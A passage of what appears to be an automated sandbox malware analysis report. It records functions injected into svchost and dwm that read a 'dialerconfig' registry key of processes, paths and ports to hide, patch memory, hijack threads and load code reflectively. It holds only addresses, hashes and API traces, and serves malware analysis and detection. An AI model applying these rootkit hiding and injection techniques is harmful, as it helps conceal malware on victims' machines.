                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                          • API String ID: 592178966-758928094
                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction ID: cf23b2fbb074f0996a586b6130d7ff35599dcc11ae84735002aa5621d2a9310f
                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction Fuzzy Hash: A7E08661640B4490DF01CF21E84529873B6DB58B6CF889162995C0A351FA3CD3E9C300
                                                          Function 00000233B91B73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: Locator'$riptor at (
                                                          • API String ID: 592178966-4215709766
                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction ID: a66dbc1f826d000c5fdf397cea7bcf5c23d0492960496e97c64c5adc1778f4f8
                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction Fuzzy Hash: 26E08661600B44C0DF01CF21D841198B376E758B58F889162C94C0A351EA3CD3E5C300
                                                          Function 00000233B91E1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction ID: f82e301e0f4944689060daa864c90d70b0525e353c5d8bb7ee5bea19fd96bdc9
                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction Fuzzy Hash: E1118F25601F4885EA44DB66A448369B3B2FB89FD8F188024DE4E87766DE3CD742E300
                                                          Function 00000233B91E1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction ID: 5bb989e9f3842a2339848b6fbaaba376754f0b4749e4e80374557ebe7b86311b
                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction Fuzzy Hash: 0EE039B560160886EB04CB62D80834AB6E2EB89B8AF048024890A07352DF7E8B99D750

                                                          Execution Graph

                                                          Execution Coverage:1.7%
                                                          Dynamic/Decrypted Code Coverage:94.5%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:109
                                                          Total number of Limit Nodes:16
                                                          execution_graph 14906 210918e1abc 14911 210918e1628 GetProcessHeap HeapAlloc 14906->14911 14908 210918e1ad2 Sleep SleepEx 14909 210918e1acb 14908->14909 14909->14908 14910 210918e1598 StrCmpIW StrCmpW 14909->14910 14910->14909 14955 210918e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14911->14955 14913 210918e1650 14956 210918e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14913->14956 14915 210918e1661 14957 210918e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14915->14957 14917 210918e166a 14958 210918e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14917->14958 14919 210918e1673 14920 210918e168e RegOpenKeyExW 14919->14920 14921 210918e18a6 14920->14921 14922 210918e16c0 RegOpenKeyExW 14920->14922 14921->14909 14923 210918e16ff RegOpenKeyExW 14922->14923 14924 210918e16e9 14922->14924 14926 210918e173a RegOpenKeyExW 14923->14926 14927 210918e1723 14923->14927 14965 210918e12bc RegQueryInfoKeyW 14924->14965 14930 210918e175e 14926->14930 14931 210918e1775 RegOpenKeyExW 14926->14931 14959 210918e104c RegQueryInfoKeyW 14927->14959 14935 210918e12bc 16 API calls 14930->14935 14932 210918e1799 14931->14932 14933 210918e17b0 RegOpenKeyExW 14931->14933 14936 210918e12bc 16 API calls 14932->14936 14937 210918e17eb RegOpenKeyExW 14933->14937 14938 210918e17d4 14933->14938 14939 210918e176b RegCloseKey 14935->14939 14940 210918e17a6 RegCloseKey 14936->14940 14942 210918e180f 14937->14942 14943 210918e1826 RegOpenKeyExW 14937->14943 14941 210918e12bc 16 API calls 14938->14941 14939->14931 14940->14933 14944 210918e17e1 RegCloseKey 14941->14944 14945 210918e104c 6 API calls 14942->14945 14946 210918e184a 14943->14946 14947 210918e1861 RegOpenKeyExW 14943->14947 14944->14937 14950 210918e181c RegCloseKey 14945->14950 14951 210918e104c 6 API calls 14946->14951 14948 210918e189c RegCloseKey 14947->14948 14949 210918e1885 14947->14949 14948->14921 14952 210918e104c 6 API calls 14949->14952 14950->14943 14953 210918e1857 RegCloseKey 14951->14953 14954 210918e1892 RegCloseKey 14952->14954 14953->14947 14954->14948 14955->14913 14956->14915 14957->14917 14958->14919 14960 210918e10bf 14959->14960 14961 210918e11b5 RegCloseKey 14959->14961 14960->14961 14962 210918e10cf RegEnumValueW 14960->14962 14961->14926 14964 210918e1125 14962->14964 14963 210918e114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14963->14964 14964->14961 14964->14962 14964->14963 14966 210918e148a RegCloseKey 14965->14966 14967 210918e1327 GetProcessHeap HeapAlloc 14965->14967 14966->14923 14968 210918e1476 GetProcessHeap HeapFree 14967->14968 14969 210918e1352 RegEnumValueW 14967->14969 14968->14966 14970 210918e13a5 14969->14970 14970->14968 14970->14969 14972 210918e141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14970->14972 14973 210918e13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14970->14973 14974 210918e152c 14970->14974 14972->14970 14973->14972 14975 210918e1546 14974->14975 14978 210918e157c 14974->14978 14976 210918e155d StrCmpIW 14975->14976 14977 210918e1565 StrCmpW 14975->14977 14975->14978 14976->14975 14977->14975 14978->14970 14979 21091cf273c 14980 21091cf276a 14979->14980 14981 21091cf27c5 VirtualAlloc 14980->14981 14984 21091cf28d4 14980->14984 14983 21091cf27ec 14981->14983 14981->14984 14982 21091cf2858 LoadLibraryA 14982->14983 14983->14982 14983->14984 14985 210918e554d 14987 210918e5554 14985->14987 14986 210918e55bb 14987->14986 14988 210918e5637 VirtualProtect 14987->14988 14989 210918e5663 GetLastError 14988->14989 14990 210918e5671 14988->14990 14989->14990 14991 210918e28c8 14993 210918e290e 14991->14993 14992 210918e2970 14993->14992 14995 210918e3844 14993->14995 14996 210918e3866 14995->14996 14997 210918e3851 StrCmpNIW 14995->14997 14996->14993 14997->14996 14998 210918e3ab9 15000 210918e3a06 14998->15000 14999 210918e3a56 VirtualQuery 14999->15000 15001 210918e3a70 14999->15001 15000->14999 15000->15001 15002 210918e3a8a VirtualAlloc 15000->15002 15002->15001 15003 210918e3abb GetLastError 15002->15003 15003->15000 15003->15001 15004 210918e5cf0 15005 210918e5cfd 15004->15005 15006 210918e5d09 15005->15006 15012 210918e5e1a 15005->15012 15007 210918e5d3e 15006->15007 15008 210918e5d8d 15006->15008 15009 210918e5d66 SetThreadContext 15007->15009 15009->15008 15010 210918e5efe 15013 210918e5f1e 15010->15013 15024 210918e43e0 15010->15024 15011 210918e5e41 VirtualProtect FlushInstructionCache 15011->15012 15012->15010 15012->15011 15020 210918e4df0 GetCurrentProcess 15013->15020 15016 210918e5f23 15017 210918e5f37 ResumeThread 15016->15017 15019 210918e5f77 _log10_special 15016->15019 15018 210918e5f6b 15017->15018 15018->15016 15021 210918e4e0c 15020->15021 15022 210918e4e22 VirtualProtect FlushInstructionCache 15021->15022 15023 210918e4e53 15021->15023 15022->15021 15023->15016 15027 210918e43fc 15024->15027 15025 210918e445f 15025->15013 15026 210918e4412 VirtualFree 15026->15027 15027->15025 15027->15026

                                                          Executed Functions

                                                          Function 00000210918E1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 106492572-2879589442
                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction ID: 72763f7fcb2438b835b7c66f7ede1fd72def14ace36c7eefa4dbafe6d0f54f88
                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction Fuzzy Hash: D6714E76310A1086EB10AF25E8E86DE33B4F7A4FA8F501211DE4E5BB6ADF74C885D340
                                                          Function 00000210918E3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction ID: b187334ec43f05d7a92131d19b4fd1b5a9071bcd114c7506a7c40aa9a8d23302
                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction Fuzzy Hash: F4118E76300B4182EF149B11E4682AA72B0F798FA5F540129DE890B756EF7DCD85D704
                                                          Function 00000210918E5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 57 210918e5b30-210918e5b57 58 210918e5b6b-210918e5b76 GetCurrentThreadId 57->58 59 210918e5b59-210918e5b68 57->59 60 210918e5b78-210918e5b7d 58->60 61 210918e5b82-210918e5b89 58->61 59->58 62 210918e5faf-210918e5fc6 call 210918e7940 60->62 63 210918e5b9b-210918e5baf 61->63 64 210918e5b8b-210918e5b96 call 210918e5960 61->64 67 210918e5bbe-210918e5bc4 63->67 64->62 70 210918e5bca-210918e5bd3 67->70 71 210918e5c95-210918e5cb6 67->71 73 210918e5c1a-210918e5c8d call 210918e4510 call 210918e44b0 call 210918e4470 70->73 74 210918e5bd5-210918e5c18 call 210918e85c0 70->74 76 210918e5e1f-210918e5e30 call 210918e74bf 71->76 77 210918e5cbc-210918e5cdc GetThreadContext 71->77 84 210918e5c90 73->84 74->84 88 210918e5e35-210918e5e3b 76->88 80 210918e5e1a 77->80 81 210918e5ce2-210918e5d03 77->81 80->76 81->80 91 210918e5d09-210918e5d12 81->91 84->67 92 210918e5efe-210918e5f0e 88->92 93 210918e5e41-210918e5e98 VirtualProtect FlushInstructionCache 88->93 95 210918e5d14-210918e5d25 91->95 96 210918e5d92-210918e5da3 91->96 102 210918e5f1e-210918e5f2a call 210918e4df0 92->102 103 210918e5f10-210918e5f17 92->103 97 210918e5e9a-210918e5ea4 93->97 98 210918e5ec9-210918e5ef9 call 210918e78ac 93->98 104 210918e5d8d 95->104 105 210918e5d27-210918e5d3c 95->105 99 210918e5e15 96->99 100 210918e5da5-210918e5dc3 96->100 97->98 107 210918e5ea6-210918e5ec1 call 210918e4390 97->107 98->88 100->99 108 210918e5dc5-210918e5e10 call 210918e3900 call 210918e74dd 100->108 118 210918e5f2f-210918e5f35 102->118 103->102 110 210918e5f19 call 210918e43e0 103->110 104->99 105->104 106 210918e5d3e-210918e5d88 call 210918e3970 SetThreadContext 105->106 106->104 107->98 108->99 110->102 122 210918e5f77-210918e5f95 118->122 123 210918e5f37-210918e5f75 ResumeThread call 210918e78ac 118->123 126 210918e5fa9 122->126 127 210918e5f97-210918e5fa6 122->127 123->118 126->62 127->126
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                          • Instruction ID: 317b171f4eca7069d1470c926f9f368976082056651611f1155322eb277ac608
                                                          • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                          • Instruction Fuzzy Hash: D9D18B76305B8881DA709B06E4E839A77A0F3D8F98F104116EACD47BA6DF7CC991DB40
                                                          Function 00000210918E50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 129 210918e50d0-210918e50fc 130 210918e50fe-210918e5106 129->130 131 210918e510d-210918e5116 129->131 130->131 132 210918e5118-210918e5120 131->132 133 210918e5127-210918e5130 131->133 132->133 134 210918e5132-210918e513a 133->134 135 210918e5141-210918e514a 133->135 134->135 136 210918e514c-210918e5151 135->136 137 210918e5156-210918e5161 GetCurrentThreadId 135->137 138 210918e56d3-210918e56da 136->138 139 210918e516d-210918e5174 137->139 140 210918e5163-210918e5168 137->140 141 210918e5176-210918e517c 139->141 142 210918e5181-210918e518a 139->142 140->138 141->138 143 210918e518c-210918e5191 142->143 144 210918e5196-210918e51a2 142->144 143->138 145 210918e51ce-210918e5225 call 210918e56e0 * 2 144->145 146 210918e51a4-210918e51c9 144->146 151 210918e523a-210918e5243 145->151 152 210918e5227-210918e522e 145->152 146->138 155 210918e5255-210918e525e 151->155 156 210918e5245-210918e5252 151->156 153 210918e5236 152->153 154 210918e5230 152->154 158 210918e52a6-210918e52aa 153->158 157 210918e52b0-210918e52b6 154->157 159 210918e5273-210918e5298 call 210918e7870 155->159 160 210918e5260-210918e5270 155->160 156->155 162 210918e52b8-210918e52d4 call 210918e4390 157->162 163 210918e52e5-210918e52eb 157->163 158->157 170 210918e529e 159->170 171 210918e532d-210918e5342 call 210918e3cc0 159->171 160->159 162->163 172 210918e52d6-210918e52de 162->172 164 210918e52ed-210918e530c call 210918e78ac 163->164 165 210918e5315-210918e5328 163->165 164->165 165->138 170->158 176 210918e5344-210918e534c 171->176 177 210918e5351-210918e535a 171->177 172->163 176->158 178 210918e536c-210918e53ba call 210918e8c60 177->178 179 210918e535c-210918e5369 177->179 182 210918e53c2-210918e53ca 178->182 179->178 183 210918e54d7-210918e54df 182->183 184 210918e53d0-210918e54bb call 210918e7440 182->184 186 210918e5523-210918e552b 183->186 187 210918e54e1-210918e54f4 call 210918e4590 183->187 195 210918e54bf-210918e54ce call 210918e4060 184->195 196 210918e54bd 184->196 188 210918e552d-210918e5535 186->188 189 210918e5537-210918e5546 186->189 201 210918e54f8-210918e5521 187->201 202 210918e54f6 187->202 188->189 192 210918e5554-210918e5561 188->192 193 210918e554f 189->193 194 210918e5548 189->194 199 210918e5564-210918e55b9 call 210918e85c0 192->199 200 210918e5563 192->200 193->192 194->193 205 210918e54d2 195->205 206 210918e54d0 195->206 196->183 208 210918e55bb-210918e55c3 199->208 209 210918e55c8-210918e5661 call 210918e4510 call 210918e4470 VirtualProtect 199->209 200->199 201->183 202->186 205->182 206->183 214 210918e5663-210918e5668 GetLastError 209->214 215 210918e5671-210918e56d1 209->215 214->215 215->138
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                          • Instruction ID: 93302ea0f6413eabd0eed96ed8b1fdaea2cc182d93878c854515c4f8a2963691
                                                          • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                          • Instruction Fuzzy Hash: 4202CC36219B8486E760DB55F4A439BB7A0F3D5B94F104015EA8E87B69DFBCC884DF00
                                                          Function 00000210918E39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocQuery
                                                          • String ID:
                                                          • API String ID: 31662377-0
                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                          • Instruction ID: 65908f7901e839850130647332826424f63d33b372770808b65f2da7ca5b6674
                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                          • Instruction Fuzzy Hash: 67312531719E8481EA30EA15E0E839F66A0F398B94F100525F9CD0A79ADFBCCDC09B04
                                                          Function 00000210918E328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction ID: bf1017c4055354d96746489f5d5f8f14d4dd013e4bf5817fd4d7966870c3c5ac
                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction Fuzzy Hash: 6D11617071064082F760B721F8FDBEB2294AB74F64F9041249D0649793EFF8CCC4A640
                                                          Function 00000210918E4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3733156554-0
                                                          • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                          • Instruction ID: 85194672db4e8330c6365d931a0beddac6bbe39cf3bdcd8d87bee84b3d71bf6e
                                                          • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                          • Instruction Fuzzy Hash: F5F0BD76318A04C0D631AB05E4E979B6BA0F398BF8F145115BA8D4BB6ACA7CC9D09B40
                                                          Function 0000021091CF273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 263 21091cf273c-21091cf27a4 call 21091cf29d4 * 4 272 21091cf27aa-21091cf27ad 263->272 273 21091cf29b2 263->273 272->273 274 21091cf27b3-21091cf27b6 272->274 275 21091cf29b4-21091cf29d0 273->275 274->273 276 21091cf27bc-21091cf27bf 274->276 276->273 277 21091cf27c5-21091cf27e6 VirtualAlloc 276->277 277->273 278 21091cf27ec-21091cf280c 277->278 279 21091cf280e-21091cf2836 278->279 280 21091cf2838-21091cf283f 278->280 279->279 279->280 281 21091cf28df-21091cf28e6 280->281 282 21091cf2845-21091cf2852 280->282 283 21091cf28ec-21091cf2901 281->283 284 21091cf2992-21091cf29b0 281->284 282->281 285 21091cf2858-21091cf286a LoadLibraryA 282->285 283->284 286 21091cf2907 283->286 284->275 287 21091cf286c-21091cf2878 285->287 288 21091cf28ca-21091cf28d2 285->288 291 21091cf290d-21091cf2921 286->291 292 21091cf28c5-21091cf28c8 287->292 288->285 289 21091cf28d4-21091cf28d9 288->289 289->281 294 21091cf2923-21091cf2934 291->294 295 21091cf2982-21091cf298c 291->295 292->288 293 21091cf287a-21091cf287d 292->293 299 21091cf287f-21091cf28a5 293->299 300 21091cf28a7-21091cf28b7 293->300 297 21091cf293f-21091cf2943 294->297 298 21091cf2936-21091cf293d 294->298 295->284 295->291 303 21091cf294d-21091cf2951 297->303 304 21091cf2945-21091cf294b 297->304 302 21091cf2970-21091cf2980 298->302 301 21091cf28ba-21091cf28c1 299->301 300->301 301->292 302->294 302->295 305 21091cf2963-21091cf2967 303->305 306 21091cf2953-21091cf2961 303->306 304->302 305->302 308 21091cf2969-21091cf296c 305->308 306->302 308->302
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: AllocLibraryLoadVirtual
                                                          • String ID:
                                                          • API String ID: 3550616410-0
                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction ID: dfd01c0fa6e883993320d879e22e8826d109a5b0656c7c10f9d78a9cd5d959f7
                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction Fuzzy Hash: BB6111B2B012D887DB54CF1590A87ADB3A3F764FA4F988121DE590778ADA78DD93C700
                                                          Function 00000210918E1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000210918E1628: GetProcessHeap.KERNEL32 ref: 00000210918E1633
                                                            • Part of subcall function 00000210918E1628: HeapAlloc.KERNEL32 ref: 00000210918E1642
                                                            • Part of subcall function 00000210918E1628: RegOpenKeyExW.ADVAPI32 ref: 00000210918E16B2
                                                            • Part of subcall function 00000210918E1628: RegOpenKeyExW.ADVAPI32 ref: 00000210918E16DF
                                                            • Part of subcall function 00000210918E1628: RegCloseKey.ADVAPI32 ref: 00000210918E16F9
                                                            • Part of subcall function 00000210918E1628: RegOpenKeyExW.ADVAPI32 ref: 00000210918E1719
                                                            • Part of subcall function 00000210918E1628: RegCloseKey.ADVAPI32 ref: 00000210918E1734
                                                            • Part of subcall function 00000210918E1628: RegOpenKeyExW.ADVAPI32 ref: 00000210918E1754
                                                            • Part of subcall function 00000210918E1628: RegCloseKey.ADVAPI32 ref: 00000210918E176F
                                                            • Part of subcall function 00000210918E1628: RegOpenKeyExW.ADVAPI32 ref: 00000210918E178F
                                                            • Part of subcall function 00000210918E1628: RegCloseKey.ADVAPI32 ref: 00000210918E17AA
                                                            • Part of subcall function 00000210918E1628: RegOpenKeyExW.ADVAPI32 ref: 00000210918E17CA
                                                          • Sleep.KERNEL32 ref: 00000210918E1AD7
                                                          • SleepEx.KERNELBASE ref: 00000210918E1ADD
                                                            • Part of subcall function 00000210918E1628: RegCloseKey.ADVAPI32 ref: 00000210918E17E5
                                                            • Part of subcall function 00000210918E1628: RegOpenKeyExW.ADVAPI32 ref: 00000210918E1805
                                                            • Part of subcall function 00000210918E1628: RegCloseKey.ADVAPI32 ref: 00000210918E1820
                                                            • Part of subcall function 00000210918E1628: RegOpenKeyExW.ADVAPI32 ref: 00000210918E1840
                                                            • Part of subcall function 00000210918E1628: RegCloseKey.ADVAPI32 ref: 00000210918E185B
                                                            • Part of subcall function 00000210918E1628: RegOpenKeyExW.ADVAPI32 ref: 00000210918E187B
                                                            • Part of subcall function 00000210918E1628: RegCloseKey.ADVAPI32 ref: 00000210918E1896
                                                            • Part of subcall function 00000210918E1628: RegCloseKey.ADVAPI32 ref: 00000210918E18A0
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1534210851-0
                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction ID: dd8bc81a09156b53dfd1f19bbad61b55331d2ed92c3a516842e43b81acb18eb7
                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction Fuzzy Hash: 53319F7170064151EF50BB26DAE93EB13A5ABA4FE4F0454219E1B8F697EFB4CCD1E210

                                                          Non-executed Functions

                                                          Function 00000210918E2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 563 210918e2b2c-210918e2ba5 call 21091902ce0 566 210918e2bab-210918e2bb1 563->566 567 210918e2ee0-210918e2f03 563->567 566->567 568 210918e2bb7-210918e2bba 566->568 568->567 569 210918e2bc0-210918e2bc3 568->569 569->567 570 210918e2bc9-210918e2bd9 GetModuleHandleA 569->570 571 210918e2bed 570->571 572 210918e2bdb-210918e2beb GetProcAddress 570->572 573 210918e2bf0-210918e2c0e 571->573 572->573 573->567 575 210918e2c14-210918e2c33 StrCmpNIW 573->575 575->567 576 210918e2c39-210918e2c3d 575->576 576->567 577 210918e2c43-210918e2c4d 576->577 577->567 578 210918e2c53-210918e2c5a 577->578 578->567 579 210918e2c60-210918e2c73 578->579 580 210918e2c75-210918e2c81 579->580 581 210918e2c83 579->581 582 210918e2c86-210918e2c8a 580->582 581->582 583 210918e2c8c-210918e2c98 582->583 584 210918e2c9a 582->584 585 210918e2c9d-210918e2ca7 583->585 584->585 586 210918e2d9d-210918e2da1 585->586 587 210918e2cad-210918e2cb0 585->587 588 210918e2da7-210918e2daa 586->588 589 210918e2ed2-210918e2eda 586->589 590 210918e2cc2-210918e2ccc 587->590 591 210918e2cb2-210918e2cbf call 210918e199c 587->591 592 210918e2dac-210918e2db8 call 210918e199c 588->592 593 210918e2dbb-210918e2dc5 588->593 589->567 589->579 595 210918e2cce-210918e2cdb 590->595 596 210918e2d00-210918e2d0a 590->596 591->590 592->593 600 210918e2dc7-210918e2dd4 593->600 601 210918e2df5-210918e2df8 593->601 595->596 603 210918e2cdd-210918e2cea 595->603 597 210918e2d0c-210918e2d19 596->597 598 210918e2d3a-210918e2d3d 596->598 597->598 604 210918e2d1b-210918e2d28 597->604 605 210918e2d3f-210918e2d49 call 210918e1bbc 598->605 606 210918e2d4b-210918e2d58 lstrlenW 598->606 600->601 608 210918e2dd6-210918e2de3 600->608 609 210918e2dfa-210918e2e03 call 210918e1bbc 601->609 610 210918e2e05-210918e2e12 lstrlenW 601->610 611 210918e2ced-210918e2cf3 603->611 614 210918e2d2b-210918e2d31 604->614 605->606 621 210918e2d93-210918e2d98 605->621 616 